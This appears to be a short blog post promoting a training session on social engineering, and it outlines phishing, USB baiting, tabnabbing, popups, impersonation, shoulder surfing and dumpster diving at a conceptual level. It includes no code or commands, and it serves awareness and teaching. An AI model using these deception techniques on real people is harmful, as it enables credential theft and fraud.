Image source: http://www.madsecurity.com/wp-content/uploads/2012/08/social-engineering-still.png |
- Computer Based
- Human Based
Computer Based attacks are done impersonating legitimate websites and applications and trick victims enter confidential of important information through a computer. Following are few techniques that uses a computer based approach.
Phishing
This is the technique of create a fake clone of a legitimate existing website which a user might frequently use. Common examples are Facebook like social engineering sites and Gmail. A user carelessly enter his/her login information to the website without checking its identity. Then the attacker logs the inputs user just entered and redirect to the legitimate website without showing the victim any difference.Baiting
Baiting is keeping a pen drive/cd/dvd which includes a malware/trojan intentionally on a place where the victim might see. In most cases if one sees a pen drive which does not seem to have an owner, they plug it into their computers and check for the content. In baiting, if the victim plugged in the usb or inserted the dvd/cd, a malware or a trojan horse inside it will be silently installed into your system in the background. Even after you removed the device, the malware is now installed in your system. This can be done using drive by downloads as well.Tabnabbing
Tabnabbing is similar to phishing but follows a rather different approach. When a user switch from the malicious site to another site through the browser's tabs, after some time the malicious tab became inactive, it will be disguise itself as the phishing site. When victim returns to the malicious tab, he/she may not understand that the previous web page has changed. And phishing happens if user enters his information.Popup windows
Browser popup windows are a great way to offer discounts and other offers which users might click on. This can also be dangerous since an attacker can redirect a user to a malicious site.and many more..
- URLs in Instant messages/IRC
- Email attachments
- Email scams
- Advertising websites and offers
Contractiction to above, Human based attacks follow a human-to-human interaction to cheat victims and grab the important information what attacker needs.Following are few human based approaches.
- Impersonating a technical staff member (such as bank official, system administrator, service desk officer etc.)
- Gather information verbally or by email/chat impersonating a trusted technical officer or an authorized party.
- Shoulder surfing
- Peeping into keyboard to see what a user type for password. An attacker should be near the victim or a way to remotely see ( a camera) user types password to do this.
- Dumpser diving
- Search for victim's dump for sensitive information accidentally thrown away.
Important things on above methods and much more things will be discussed, demonstrated on the ISCSE Session 1 on Social Engineering attacks. And participants will be able to get hands on experience on how to perform those attacks.Further References: